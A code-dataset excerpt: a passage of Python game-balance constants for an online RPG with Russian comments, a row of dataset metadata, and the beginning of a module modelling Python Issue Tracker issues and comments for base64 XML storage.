ANGEL_ENERGY_REGENERATION_PERIOD: int = int(ANGEL_ENERGY_REGENERATION_TIME * TURNS_IN_HOUR)  # once every this many turns
ANGEL_ENERGY_IN_DAY: int = int(24.0 / ANGEL_ENERGY_REGENERATION_TIME * ANGEL_ENERGY_REGENERATION_AMAUNT)
ANGEL_ENERGY_REGENERATION_LENGTH: int = 3  # how many turns regenerating one unit of energy takes
# energy must fully regenerate within a day; a fresh regeneration mark should appear every 2 hours

##########################
# angel abilities
##########################
ANGEL_HELP_COST: int = 4
ANGEL_ARENA_COST: int = 1
ANGEL_ARENA_QUIT_COST: int = 0
ANGEL_DROP_ITEM_COST: int = 1
ANGEL_HELP_HEAL_FRACTION: Tuple[float, float] = (0.25, 0.5)  # (min, max) fraction of HP that will be healed
ANGEL_HELP_TELEPORT_DISTANCE: float = 1.0  # distance covered by the teleport
ANGEL_HELP_LIGHTING_FRACTION: Tuple[float, float] = (0.25, 0.5)  # (min, max) fraction of damage that will be dealt
ANGEL_HELP_CRIT_HEAL_FRACTION: Tuple[float, float] = (0.5, 0.75)  # (min, max) fraction of HP healed on a critical help
ANGEL_HELP_CRIT_TELEPORT_DISTANCE: float = 3.0  # distance covered by a critical teleport
ANGEL_HELP_CRIT_LIGHTING_FRACTION: Tuple[float, float] = (0.5, 0.75)  # (min, max) fraction of damage dealt on a critical help
ANGEL_HELP_CRIT_MONEY_MULTIPLIER: int = 10
ANGEL_HELP_CRIT_MONEY_FRACTION: Tuple[float, float] = (0.75, 1.25)
ANGEL_ENERGY_INSTANT_REGENERATION_IN_PLACE: int = ANGEL_HELP_COST
INITIAL_ENERGY_AMOUNT: int = 25 * ANGEL_HELP_COST  # player's starting energy (enough for many helps, but not excessive)
######################################
# зависимость изменения скорости от изменения безопасности
# при фиксированном количестве боёв за цикл движения, изменение скорости эквивалентное изменению вероятности боя
# можно получить исходя из того, что пройденные пути должны быть равными (т.к. количество ходов движения пренебрежительно мало по сравнению с прочими ходами)
# так же можно пренебречь количеством отдыха
# уравнение:
# y — изменение скорости
# x — изменение вероятности
# 1 / battle_probability - 1 — количество ходов на одну битву
# (1 + y) * speed * (1 / battle_probability - 1) = speed * (1 / (battle_probability - x) - 1)
#
# y = -x / ((battle_probability + x)*(1 - battle_probability))
#
# Так как полученный коофициент зависит от вероятности боя и дельты, а они варьируется, нам необходимо выбрать для «наиболее общего случая»:
# - фиксированную вероятность
# - фиксированную дельту
# которые послужит базой для расчёта коофициента пересчёта безопасности в транспорт
def speed_from_safety(danger: float, battles_per_turn: float) -> float:
    """Speed delta equivalent to shifting the battle probability by ``danger``.

    Solves the path-equality equation documented above for ``y``, with
    ``x = danger`` and ``p = battles_per_turn``:
    ``(1 + y) * (1 / p - 1) = 1 / (p - x) - 1``.
    """
    denominator = (battles_per_turn + danger) * (1.0 - battles_per_turn)
    return -danger / denominator
# Safety-to-transport conversion coefficient, evaluated for the "most common case"
# of a 1% battle-probability delta at the standard battles-per-turn rate.
_SAFETY_TO_TRANSPORT: float = round(-speed_from_safety(0.01, BATTLES_PER_TURN) / 0.01)
##########################
# Карта
##########################
MINIMUM_QUESTS_REGION_SIZE: int = 15
DEFAULT_QUESTS_REGION_SIZE: int = 25
MAP_SYNC_TIME_HOURS: int = 1
MAP_SYNC_TIME: int = int(TURNS_IN_HOUR * MAP_SYNC_TIME_HOURS) # синхронизируем карту раз в N часов
CELL_SAFETY_MIN: float = 0.05
CELL_SAFETY_MAX: float = 0.95
CELL_SAFETY_DELTA: float = 0.01
CELL_SAFETY_NO_PATRULES: float = -0.5
CELL_TRANSPORT_MIN: float = CELL_SAFETY_MIN * _SAFETY_TO_TRANSPORT
CELL_TRANSPORT_DELTA: float = CELL_SAFETY_DELTA * _SAFETY_TO_TRANSPORT
CELL_TRANSPORT_MAGIC: float = -CELL_TRANSPORT_DELTA
CELL_TRANSPORT_HAS_MAIN_ROAD: float = 0.5
CELL_TRANSPORT_HAS_OFF_ROAD: float = CELL_TRANSPORT_HAS_MAIN_ROAD / 2
# дорога по клетке без штрафов и модификаторов должна давать 100% скорость
CELL_TRANSPORT_BASE: float = 1.0 - CELL_TRANSPORT_HAS_MAIN_ROAD
PATH_MODIFIER_MINOR_DELTA: float = 0.025
PATH_MODIFIER_NORMAL_DELTA: float = 0.075
PATH_MODIFIER_MINIMUM_MULTIPLIER: float = 0.1
##########################
# Задания
##########################
QUESTS_PILGRIMAGE_FRACTION: float = 0.025 # вероятность отправить героя в паломничество
##########################
# Влияние
##########################
HERO_FAME_PER_HELP: int = 1000 # стандартное количество известности, которое получает герой за помощь городу
HERO_POWER_PER_DAY: int = 100 # базовое количество влияния, которое герой 1-ого уровня производит в день на одного жителя задействованного в заданиях
PERSON_POWER_PER_QUEST_FRACTION: float = 0.33 # разброс влияния за задание
PERSON_POWER_FOR_RANDOM_SPEND: int = 200
MINIMUM_CARD_POWER: int = HERO_POWER_PER_DAY
EXPECTED_HERO_QUEST_POWER_MODIFIER: float = 5
# в 2 раза больше, так как карту надо применять к конкретному квесту, а не сразу к мастеру
# в EXPECTED_HERO_QUEST_POWER_MODIFIER раз меньше, так как на эффект квеста действует политический бонус героя, считаем его в среднем равным EXPECTED_HERO_QUEST_POWER_MODIFIER
CARD_BONUS_FOR_QUEST: int = int(2 * MINIMUM_CARD_POWER / EXPECTED_HERO_QUEST_POWER_MODIFIER)
NORMAL_JOB_LENGTH: int = 4 # минимальная длительность занятия мастера в днях
JOB_MIN_POWER: float = 0.5
JOB_MAX_POWER: float = 2.0
JOB_NEGATIVE_POWER_MULTIPLIER: float = 2.0 # множитель награды для противников: ломать — не строить
##########################
# споособности
##########################
ABILITIES_ACTIVE_MAXIMUM: int = 5
ABILITIES_PASSIVE_MAXIMUM: int = 2
ABILITIES_BATTLE_MAXIMUM: int = ABILITIES_ACTIVE_MAXIMUM + ABILITIES_PASSIVE_MAXIMUM
ABILITIES_NONBATTLE_MAXIMUM: int = 4
ABILITIES_COMPANION_MAXIMUM: int = 4
ABILITIES_OLD_ABILITIES_FOR_CHOOSE_MAXIMUM: int = 2
ABILITIES_FOR_CHOOSE_MAXIMUM: int = 4
##########################
# Черты
##########################
HABITS_NEW_HERO_POINTS: int = 200
HABITS_BORDER: int = 1000 # модуль максимального значения черты
HABITS_RIGHT_BORDERS: List[int] = [-700, -300, -100, 100, 300, 700, 1001] # правые границы черт
HABITS_QUEST_ACTIVE_DELTA: float = 20.0 # за выбор в задании игроком
HABITS_QUEST_PASSIVE_DELTA: float = 0.05 * HABITS_QUEST_ACTIVE_DELTA # за неверный выбор героем
HABITS_HELP_ABILITY_DELTA: float = HABITS_BORDER / (60 * ANGEL_ENERGY_IN_DAY / ANGEL_HELP_COST) # за использование способности
HABITS_ARENA_ABILITY_DELTA: float = HABITS_BORDER / (60 * ANGEL_ENERGY_IN_DAY / ANGEL_ARENA_COST) # за использование способности
HABITS_QUEST_ACTIVE_PREMIUM_MULTIPLIER: float = 1.5 # бонус к начисляемому влиянию за выбор игрока для подписчиков
KILL_BEFORE_BATTLE_PROBABILITY: float = 0.05 # вероятность убить мобы в начале боя
PICKED_UP_IN_ROAD_TELEPORT_LENGTH: float = ANGEL_HELP_TELEPORT_DISTANCE
# бонус к скорости передвижения, эквивалентный вероятности убить моба
PICKED_UP_IN_ROAD_SPEED_BONUS: float = BATTLES_PER_TURN * KILL_BEFORE_BATTLE_PROBABILITY * _SAFETY_TO_TRANSPORT
PICKED_UP_IN_ROAD_PROBABILITY: float = PICKED_UP_IN_ROAD_SPEED_BONUS / PICKED_UP_IN_ROAD_TELEPORT_LENGTH
HABIT_QUEST_PRIORITY_MODIFIER: float = 1.0 # модификатор приоритета выбора заданий от предпочтений
HONOR_POWER_BONUS_FRACTION: float = 1.5 # бонус к влиянию для чести
MONSTER_TYPE_BATTLE_CRIT_MAX_CHANCE: float = 0.02 # вероятность крита по типу монстра, если все монстры этого типа
HABIT_QUEST_REWARD_MAX_BONUS: float = 1.0 # максимальный бонус к награде за задание при выборе, совпадающем с чертой
HABIT_LOOT_PROBABILITY_MODIFIER: float = 1.2 # бонус к вероятности получить любой лут
PEACEFULL_BATTLE_PROBABILITY: float = 0.01 # вероятность мирно разойтись с монстром, если все можно расходиться со всеми типами монстров
# вероятность получить опыт расчитывается исходя из:
# - средней величины получаемого опыта
# - ускорения прокачки от первого удара (вычитается)
# - проигрыша агрессивного использования способностей (молния) перед мирными (телепортом) (плюсуется)
# - лечение не учитываем, т.к. оно может быть применено и в бою и не в бою
# процент сохранённых ходов от первого удара
_FIRST_STRIKE_TURNS_BONUS: float = (0.5 * BATTLES_BEFORE_HEAL) / ACTIONS_CYCLE_LENGTH # выигрываем полхода в каждой битве
_HELPS_IN_TURN = (float(ANGEL_ENERGY_IN_DAY) / ANGEL_HELP_COST) / 24 / TURNS_IN_HOUR
# процент сохранённых ходов сражения, если только бьём молнией
_BATTLE_TURNS_BONUS_FROM_ON_USE: float = (float(BATTLE_LENGTH) * (sum(ANGEL_HELP_LIGHTING_FRACTION) / 2) + HEAL_LENGTH * (sum(ANGEL_HELP_HEAL_FRACTION) / 2)) / 2
_BATTLE_TURNS_BONUS: float = _BATTLE_TURNS_BONUS_FROM_ON_USE * _HELPS_IN_TURN
# процент сохранённых ходов движения, если только телепортируем
_TELEPORT_MOVE_TURNS: float = ANGEL_HELP_TELEPORT_DISTANCE / HERO_MOVE_SPEED
_TELEPORT_SAVED_BATTLES: float = _TELEPORT_MOVE_TURNS / INTERVAL_BETWEEN_BATTLES
_TELEPORT_SAVED_TURNS: float = _TELEPORT_MOVE_TURNS + _TELEPORT_SAVED_BATTLES * BATTLE_LENGTH + HEAL_LENGTH * _TELEPORT_SAVED_BATTLES / BATTLES_BEFORE_HEAL
_TELEPORT_TURNS_BONUS: float = _TELEPORT_SAVED_TURNS * _HELPS_IN_TURN
# процент сохранённых ходов от мирного расхождения с монстрами
_PEACEFULL_TURNS_BONUS: float = (PEACEFULL_BATTLE_PROBABILITY * float(BATTLES_BEFORE_HEAL) * BATTLE_LENGTH) / ACTIONS_CYCLE_LENGTH
# print 'battles in day', TURNS_IN_HOUR * 24 / ACTIONS_CYCLE_LENGTH * BATTLES_BEFORE_HEAL
# print 'inverted', 1.0 / (TURNS_IN_HOUR * 24 / ACTIONS_CYCLE_LENGTH * BATTLES_BEFORE_HEAL)
# print 'strike', _FIRST_STRIKE_TURNS_BONUS
# print 'battle', _BATTLE_TURNS_BONUS
# print 'teleport', _TELEPORT_TURNS_BONUS
EXP_FOR_KILL: int = 2 * EXP_PER_HOUR # средний опыт за убийство монстра
EXP_FOR_KILL_DELTA: float = 0.3 # разброс опыта за убийство
_KILLS_IN_HOUR: float = TURNS_IN_HOUR / ACTIONS_CYCLE_LENGTH * BATTLES_BEFORE_HEAL
_REQUIRED_EXP_BONUS = _TELEPORT_TURNS_BONUS + _PEACEFULL_TURNS_BONUS - _BATTLE_TURNS_BONUS - _FIRST_STRIKE_TURNS_BONUS
# вероятность получить опыт за убийство моба
EXP_FOR_KILL_PROBABILITY: float = EXP_PER_HOUR * _REQUIRED_EXP_BONUS / _KILLS_IN_HOUR / EXP_FOR_KILL
###########################
# события для черт
###########################
HABIT_EVENTS_IN_DAY: float = 1.33 # количество событий в сутки
HABIT_EVENTS_IN_TURN: float = HABIT_EVENTS_IN_DAY / 24 / TURNS_IN_HOUR # вероятность события в ход
HABIT_MOVE_EVENTS_IN_TURN: float = HABIT_EVENTS_IN_TURN / (BATTLES_BEFORE_HEAL * INTERVAL_BETWEEN_BATTLES / float(ACTIONS_CYCLE_LENGTH)) # вероятность события при движении
HABIT_IN_PLACE_EVENTS_IN_TURN: float = HABIT_MOVE_EVENTS_IN_TURN * 10 # вероятность события в городе (с учётом имплементации)
# приоритеты событий с разными эффектами
HABIT_EVENT_NOTHING_PRIORITY: float = 4.0
HABIT_EVENT_MONEY_PRIORITY: float = 4.0
HABIT_EVENT_ARTIFACT_PRIORITY: float = 2.0
HABIT_EVENT_EXPERIENCE_PRIORITY: float = 1.0
# получаемые деньги могут быть эквиваленты цене продажи артефакта
# артефакт может создаваться обычным (как при луте)
# считаем, что можем позволить ускорить прокачку на 5%
_HABIT_EVENT_TOTAL_PRIORITY: float = HABIT_EVENT_NOTHING_PRIORITY + HABIT_EVENT_MONEY_PRIORITY + HABIT_EVENT_ARTIFACT_PRIORITY + HABIT_EVENT_EXPERIENCE_PRIORITY
HABIT_EVENT_EXPERIENCE: int = int(0.05 * (24.0 * EXP_PER_HOUR) / (HABIT_EVENTS_IN_DAY * HABIT_EVENT_EXPERIENCE_PRIORITY / _HABIT_EVENT_TOTAL_PRIORITY))
HABIT_EVENT_EXPERIENCE_DELTA: float = 0.5 # разброс опыта
###########################
# pvp
###########################
DAMAGE_PVP_ADVANTAGE_MODIFIER: float = 0.5 # на какую долю изменяется урон при максимальной разнице в преимуществе между бойцами
DAMAGE_PVP_FULL_ADVANTAGE_STRIKE_MODIFIER: float = 5.0 # во сколько раз увеличится урон удара при максимальном преимушестве
PVP_MAX_ADVANTAGE_STEP: float = 0.25
PVP_ADVANTAGE_BARIER: float = 0.95
PVP_EFFECTIVENESS_EXTINCTION_FRACTION: float = 0.1
PVP_EFFECTIVENESS_STEP: float = 10
PVP_EFFECTIVENESS_INITIAL: float = 300
###########################
# города
###########################
PLACE_MIN_PERSONS: int = 2
PLACE_MAX_PERSONS: List[int] = [0, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6]
PLACE_ABSOLUTE_MAX_PERSONS: int = PLACE_MAX_PERSONS[-1]
PLACE_MIN_STABILITY: float = 0.0
PLACE_MIN_CULTURE: float = 0.2
PLACE_MIN_FREEDOM: float = 0.1
PLACE_BASE_STABILITY: float = 1.0
PLACE_MAX_SIZE: int = 10
PLACE_MAX_ECONOMIC: int = 10
PLACE_MAX_FRONTIER_ECONOMIC: int = 5
PLACE_NEW_PLACE_LIVETIME: int = 2 * 7 * 24 * 60 * 60
PLACE_POWER_HISTORY_WEEKS: int = 6 # количество недель, которое хранится влияние города
PLACE_POWER_HISTORY_LENGTH: int = int(PLACE_POWER_HISTORY_WEEKS * 7 * 24 * TURNS_IN_HOUR) # в ходах
PLACE_POWER_RECALCULATE_STEPS: float = PLACE_POWER_HISTORY_LENGTH / MAP_SYNC_TIME
PLACE_POWER_REDUCE_FRACTION: float = math.pow(0.01, 1.0 / PLACE_POWER_RECALCULATE_STEPS)
PLACE_FAME_REDUCE_FRACTION: float = PLACE_POWER_REDUCE_FRACTION
PLACE_MONEY_REDUCE_FRACTION: float = PLACE_POWER_REDUCE_FRACTION
PLACE_TYPE_NECESSARY_BORDER: int = 75
PLACE_TYPE_ENOUGH_BORDER: int = 50
PLACE_GOODS_BONUS: int = 100 # в час, соответственно PLACE_GOODS_BONUS * LEVEL — прирост/убыль товаров в городе
PLACE_GOODS_TO_LEVEL: int = int(PLACE_GOODS_BONUS * (1 + 3.0 / 2) * 24) # 1 город + 3 средних жителя за 24 часа
PLACE_GOODS_AFTER_LEVEL_UP: float = 0.25 # процент товаров, остающихся при увеличении размера города
PLACE_GOODS_AFTER_LEVEL_DOWN: float = 0.75 # процент товаров, возвращающихся при уменьшении размера города
PLACE_GOODS_FROM_BEST_PERSON: int = PLACE_GOODS_BONUS // 2
PLACE_GOODS_FOR_BUILDING_SUPPORT: int = PLACE_GOODS_FROM_BEST_PERSON * 3 // 5
# поскольку наибольшая статья расходов на стабилизацию ландшафта — дороги, то расчёт делаем исходя из них
# здания и города будут вкладывать значительно меньше в эту статью трат (потому что меньше клеток занимают)
#
# во ремя введения стабилизации магии средний город имел дорог ~ 26 клеток, т.е. по 13, если делить поровну между двумя точками
# округлим до 15
PLACE_AVERAGE_TOTAL_ROADS_PRICE: int = int(1.5 * PLACE_GOODS_BONUS) # средняя стоимость поддержки дорог для города
CELL_STABILIZATION_PRICE: int = PLACE_AVERAGE_TOTAL_ROADS_PRICE // 15
# если размер города равен 1 (минимальный) и производство отрицательное
# то в городе вводят пошлину в размере "недостающее производство" * PLACE_TAX_PER_ONE_GOODS
PLACE_TAX_PER_ONE_GOODS: float = 0.1 / PLACE_GOODS_BONUS
# максимальное производство от пошлины фиксируется статически, а не динамически (например как 1/PLACE_TAX_PER_ONE_GOODS)
# поскольку последнее:
# - либо сделает пошлину крайне невыгодной в книге судеб
# - либо позволит поддерживать город максимального размера при, ожидаемом минимальном размере
MAX_PRODUCTION_FROM_TAX: int = int(PLACE_GOODS_BONUS * 2.5)
# исходим из того, что в первую очередь надо балансировать вероятность нападения монстров как самый важный параметр
PLACE_SAFETY_FROM_BEST_PERSON: float = 0.025
PLACE_TRANSPORT_FROM_BEST_PERSON: float = PLACE_SAFETY_FROM_BEST_PERSON * _SAFETY_TO_TRANSPORT
# хотя на опыт свобода и не влияет, но на город оказывает такое-же влияние как и транспорт
PLACE_FREEDOM_FROM_BEST_PERSON: float = PLACE_TRANSPORT_FROM_BEST_PERSON
PLACE_CULTURE_FROM_BEST_PERSON: float = 0.15
PLACE_RACE_CHANGE_DELTA_IN_DAY: float = 0.1
PLACE_RACE_CHANGE_DELTA: float = (PLACE_RACE_CHANGE_DELTA_IN_DAY * MAP_SYNC_TIME) / (24 * TURNS_IN_HOUR)
PLACE_STABILITY_UNIT: float = 0.1 # базовая единица изменения стабильности
PLACE_STABILITY_MAX_PRODUCTION_PENALTY: float = -PLACE_GOODS_BONUS * 2
PLACE_STABILITY_MAX_SAFETY_PENALTY: float = -0.15
PLACE_STABILITY_MAX_TRANSPORT_PENALTY: float = PLACE_STABILITY_MAX_SAFETY_PENALTY * _SAFETY_TO_TRANSPORT
PLACE_STABILITY_MAX_FREEDOM_PENALTY: float = -PLACE_STABILITY_MAX_TRANSPORT_PENALTY
PLACE_STABILITY_MAX_CULTURE_PENALTY: float = -1.0
PLACE_STABILITY_PENALTY_FOR_MASTER: float = -0.15
PLACE_STABILITY_PENALTY_FOR_RACES: float = -0.5 # штраф к стабильности за 100% разницы в давлении рас
PLACE_STABILITY_PENALTY_FOR_SPECIALIZATION: float = -0.5 # штраф за полное несоответствие специализации (когда 0 очков)
# считаем на сколько условных единиц бонусов от Мастеров влияет нулевая стабильность
_STABILITY_PERSONS_POINTS: float = (abs(PLACE_STABILITY_MAX_PRODUCTION_PENALTY) / PLACE_GOODS_FROM_BEST_PERSON +
abs(PLACE_STABILITY_MAX_SAFETY_PENALTY) / PLACE_SAFETY_FROM_BEST_PERSON +
abs(PLACE_STABILITY_MAX_TRANSPORT_PENALTY) / PLACE_TRANSPORT_FROM_BEST_PERSON +
-abs(PLACE_STABILITY_MAX_FREEDOM_PENALTY) / PLACE_FREEDOM_FROM_BEST_PERSON + # на свободу отсутствие стабильности влияет положительно
abs(PLACE_STABILITY_MAX_CULTURE_PENALTY) / PLACE_CULTURE_FROM_BEST_PERSON)
# считаем максимальную стабильность от Мастера
PLACE_STABILITY_FROM_BEST_PERSON: float = 1.0 / _STABILITY_PERSONS_POINTS
WHILD_TRANSPORT_PENALTY: float = 0.1 # штраф к скорости в диких землях и на фронтире
TRANSPORT_FROM_PLACE_SIZE_PENALTY: float = 0.05 # штраф к скорости от размера города
PLACE_HABITS_CHANGE_SPEED_MAXIMUM: float = 10
PLACE_HABITS_CHANGE_SPEED_MAXIMUM_PENALTY: float = 10
PLACE_HABITS_EVENT_PROBABILITY: float = 0.025
JOB_PRODUCTION_BONUS: int = PLACE_GOODS_BONUS
JOB_SAFETY_BONUS: float = PLACE_SAFETY_FROM_BEST_PERSON
JOB_TRANSPORT_BONUS: float = PLACE_TRANSPORT_FROM_BEST_PERSON
JOB_FREEDOM_BONUS: float = PLACE_FREEDOM_FROM_BEST_PERSON
JOB_STABILITY_BONUS: float = PLACE_STABILITY_UNIT
JOB_CULTURE_BONUS: float = PLACE_CULTURE_FROM_BEST_PERSON
RESOURCE_EXCHANGE_COST_PER_CELL: int = int(math.floor(PLACE_GOODS_BONUS / 40))
# время жизни взято «на глаз», чтобы:
# - с одной стороны, обеспечить значимость эффекта для города
# - с другой, предотвратить скопление одинаковых эффектов (от проектов Мастеров, например)
PLACE_STANDARD_EFFECT_LENGTH: int = 15 # в днях
PLACE_STABILITY_RECOVER_SPEED: float = PLACE_STABILITY_UNIT / (PLACE_STANDARD_EFFECT_LENGTH * 24) # стабильности в час
###########################
# мастера
###########################
PERSON_MOVE_DELAY_IN_WEEKS: int = 2
PERSON_MOVE_DELAY: int = int(TURNS_IN_HOUR * 24 * 7 * PERSON_MOVE_DELAY_IN_WEEKS) # минимальная задержка между переездами Мастера
PERSON_SOCIAL_CONNECTIONS_LIMIT: int = 3
PERSON_SOCIAL_CONNECTIONS_MIN_LIVE_TIME_IN_WEEKS: int = 2
PERSON_SOCIAL_CONNECTIONS_MIN_LIVE_TIME: int = int(TURNS_IN_HOUR * 24 * 7 * PERSON_SOCIAL_CONNECTIONS_MIN_LIVE_TIME_IN_WEEKS)
PERSON_SOCIAL_CONNECTIONS_POWER_BONUS: float = 0.1
###########################
# здания
###########################
BUILDING_POSITION_RADIUS: int = 2
BUILDING_PERSON_POWER_BONUS: float = 0.5
BUILDING_TERRAIN_POWER_MULTIPLIER: float = 0.5 # building terrain power is percent from city power
###########################
# Спутники
###########################
# под средним спутником понимается спутник со
# - средним здоровьем
# - средней самоотверженностью
# - средней слаженностью
# рост слаженности огранизуется так, чтобы она росла сначала быстро, потом ооооооочень долго
# в качестве опыта идёт 1 выполненного задания
# для получения слаженности N требуется N опыта
COMPANIONS_MIN_COHERENCE: int = 0 # минимальный уровень слаженности
COMPANIONS_MAX_COHERENCE: int = 100 # максимальный уровень слаженности
# опыта к слаженности за выполненный квест
# подбирается так, чтобы слаженность росла до максимума примерно за 9 месяцев
EXPECTED_FULL_COHERENCE_TIME = 9 * 30 * 24 * 60 * 60
COMPANIONS_MEDIUM_COHERENCE: float = (COMPANIONS_MIN_COHERENCE + COMPANIONS_MAX_COHERENCE) / 2
COMPANIONS_MIN_HEALTH: int = 300 # минимальное максимальное здоровье спутника
COMPANIONS_MAX_HEALTH: int = 700 # максимальное максимальное здоровье спутника
COMPANIONS_MEDIUM_HEALTH: float = (COMPANIONS_MIN_HEALTH + COMPANIONS_MAX_HEALTH) / 2
_COMPANIONS_MEDIUM_LIFETYME: int = 9 # ожидаемое время жизни среднего спутника со средним здоровьем без лечения в днях
# дельты мультипликатора вероятности блока для
COMPANIONS_BLOCK_MULTIPLIER_COHERENCE_DELTA: float = 0.2 # слаженность (от среднего)
COMPANIONS_BLOCK_MULTIPLIER_COMPANION_DEDICATION_DELTA: float = 0.2 # самоотверженности спутника
COMPANIONS_BLOCK_MULTIPLIER_HERO_DEDICATION_DELTA: float = 0.2 # самоотверженность героя
COMPANIONS_HABITS_DELTA: float = 0.5 # дельта изменения черт от среднего в зависимости от предпочтения
COMPANIONS_DEFEND_PROBABILITY: float = COMPANIONS_DEFENDS_IN_BATTLE / (BATTLE_LENGTH / 2)
COMPANIONS_HEALS_IN_HOUR: float = 1.0 # частота действия уход за спутником в час
COMPANIONS_HEALTH_PER_HEAL: int = 2 # лечение спутника за одно действие ухода за спутником
COMPANIONS_DAMAGE_PER_WOUND: int = 10 # урон спутнику за ранение
# частота ранений героя
COMPANIONS_WOUNDS_IN_HOUR_FROM_HEAL: float = COMPANIONS_HEALS_IN_HOUR * COMPANIONS_HEALTH_PER_HEAL / COMPANIONS_DAMAGE_PER_WOUND
COMPANIONS_WOUNDS_IN_HOUR_FROM_WOUNDS: float = COMPANIONS_MEDIUM_HEALTH / COMPANIONS_DAMAGE_PER_WOUND / (_COMPANIONS_MEDIUM_LIFETYME * 24)
COMPANIONS_WOUNDS_IN_HOUR: float = COMPANIONS_WOUNDS_IN_HOUR_FROM_WOUNDS + COMPANIONS_WOUNDS_IN_HOUR_FROM_HEAL
COMPANIONS_WOUND_ON_DEFEND_PROBABILITY_FROM_WOUNDS: float = COMPANIONS_WOUNDS_IN_HOUR_FROM_WOUNDS / (BATTLES_PER_HOUR * COMPANIONS_DEFENDS_IN_BATTLE)
# величины лечения здоровья спутника за одну помощь
COMPANIONS_HEAL_AMOUNT: int = 20
COMPANIONS_HEAL_CRIT_AMOUNT: int = COMPANIONS_HEAL_AMOUNT * 2
# вероятность того, что спутник использует способность во время боя
# на столько же должны увеличивать инициативу особенности спутника с боевыми способностями
COMPANIONS_BATTLE_STRIKE_PROBABILITY: float = 0.05
COMPANIONS_EXP_PER_MOVE_GET_EXP: int = 1 # получаемый героем опыт за одно «действие получения опыта во время движения героя»
# количество получений опыта от спутника в час
COMPANIONS_GET_EXP_MOVE_EVENTS_PER_HOUR: float = EXP_PER_HOUR * COMPANIONS_BONUS_EXP_FRACTION / COMPANIONS_EXP_PER_MOVE_GET_EXP
COMPANIONS_EXP_PER_MOVE_PROBABILITY = COMPANIONS_GET_EXP_MOVE_EVENTS_PER_HOUR / MOVE_TURNS_IN_HOUR
# количество опыта за каждое лечение спутника (при наличии нужной способности)
COMPANIONS_EXP_PER_HEAL: int = int(EXP_PER_HOUR * COMPANIONS_BONUS_EXP_FRACTION / COMPANIONS_HEALS_IN_HOUR)
COMPANIONS_HEAL_BONUS: float = 0.25 # доля отлечиваемого способностями спутников или героя
# количество вылеченного здоровья в час для спутников с лечебной способностью (рассчитывается исходя только из ранений, не компенсирующих лечение действием ухода)
COMPANIONS_REGEN_PER_HOUR: float = COMPANIONS_WOUNDS_IN_HOUR_FROM_WOUNDS * COMPANIONS_DAMAGE_PER_WOUND * COMPANIONS_HEAL_BONUS
COMPANIONS_EATEN_CORPSES_HEAL_AMOUNT: int = 1
COMPANIONS_REGEN_ON_HEAL_AMOUNT: int = 1
COMPANIONS_REGEN_BY_HERO: int = 1
COMPANIONS_REGEN_BY_MONEY_SPEND: int = 1
COMPANIONS_EATEN_CORPSES_PER_BATTLE: float = COMPANIONS_REGEN_PER_HOUR / BATTLES_PER_HOUR / COMPANIONS_EATEN_CORPSES_HEAL_AMOUNT
COMPANIONS_REGEN_ON_HEAL_PER_HEAL: float = COMPANIONS_REGEN_PER_HOUR / COMPANIONS_HEALS_IN_HOUR / COMPANIONS_REGEN_ON_HEAL_AMOUNT
COMPANIONS_HERO_REGEN_ON_HEAL_PER_HEAL: float = COMPANIONS_REGEN_PER_HOUR / COMPANIONS_HEALS_IN_HOUR / COMPANIONS_REGEN_BY_HERO
COMPANIONS_GIVE_COMPANION_AFTER: int = 24 # выдавать спутника герою без спутника примерно раз в N часов
COMPANIONS_LEAVE_IN_PLACE: float = 1.0 / 20 # вероятность того, что нелюдимый спутник покинет героя в городе
COMPANIONS_BONUS_DAMAGE_PROBABILITY: float = 0.25 # вероятность спутника получить дополнительный урон
##############################
# Bills
##############################
PLACE_MAX_BILLS_NUMBER: int = 3
FREE_ACCOUNT_MAX_ACTIVE_BILLS: int = 1
PREMIUM_ACCOUNT_MAX_ACTIVE_BILLS: int = 4
BILLS_FAME_BORDER: int = HERO_FAME_PER_HELP
| 50.33037 | 215 | 0.791099 | 4,856 | 33,973 | 5.216227 | 0.233526 | 0.020134 | 0.004974 | 0.004422 | 0.2167 | 0.115871 | 0.072167 | 0.054955 | 0.038847 | 0.027556 | 0 | 0.022774 | 0.131457 | 33,973 | 674 | 216 | 50.405045 | 0.835158 | 0.430518 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001484 | 0 | 1 | 0.003279 | false | 0.009836 | 0.006557 | 0.003279 | 0.013115 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
876c05276d4206f01cd3257543b6922a7f4d4074 | 5,485 | py | Python | pyissues/base.py | HuangFuSL/python-issues | d7c360e89503add9f56676326d628b80c7a84923 | [
"MIT"
] | null | null | null | pyissues/base.py | HuangFuSL/python-issues | d7c360e89503add9f56676326d628b80c7a84923 | [
"MIT"
] | null | null | null | pyissues/base.py | HuangFuSL/python-issues | d7c360e89503add9f56676326d628b80c7a84923 | [
"MIT"
] | null | null | null | """Base module of pyissues package
This module provides data model for issues and comments from the Python Issue
Tracker (https://bugs.python.org) with methods to save the issue in
base64-encoded XML format.
"""
from __future__ import annotations
import base64
import warnings
from typing import List
import lxml.etree
from . import const
class UnreadableXMLWarning(Warning):
    """Warning raised when fields are written into XML without being
    base64 encoded.

    Illegal characters such as b"\\x01" would make the generated XML
    document unreadable.

    Subclasses ``Warning`` (not plain ``Exception``) so that instances
    passed to ``warnings.warn`` keep their own category instead of being
    reported as a generic ``UserWarning``.  ``Warning`` is itself an
    ``Exception`` subclass, so existing ``except`` clauses still match.
    """
class Comment():
    """A single comment on a Python Issue Tracker issue.

    Identity (hashing and equality) is based solely on the comment URL.
    """

    def __init__(self, url: str, author: str, content: str, date: str, username: str):
        self.url = url            # permalink of the comment
        self.author = author      # display name of the author
        self.content = content    # message body
        self.username = username  # tracker login of the author
        self.date = date          # timestamp string as published by the tracker

    @staticmethod
    def get_fields() -> List[str]:
        """The following attributes are saved as attributes instead of text
        nodes in the XML document.
        """
        return ['url', 'author', 'date', 'username']

    def __repr__(self) -> str:
        return "<%s by %s>" % (self.url, self.author)

    def __str__(self) -> str:
        return self.content

    def __hash__(self) -> int:
        return hash(self.url)

    def __eq__(self, o) -> bool:
        # Defer to the other operand instead of raising AttributeError
        # when compared against a non-Comment object.
        if not isinstance(o, Comment):
            return NotImplemented
        return self.url == o.url
class Issue():
    """A single issue from the Python Issue Tracker.

    Field names come from ``const._ISSUE_FIELD``; scalar fields
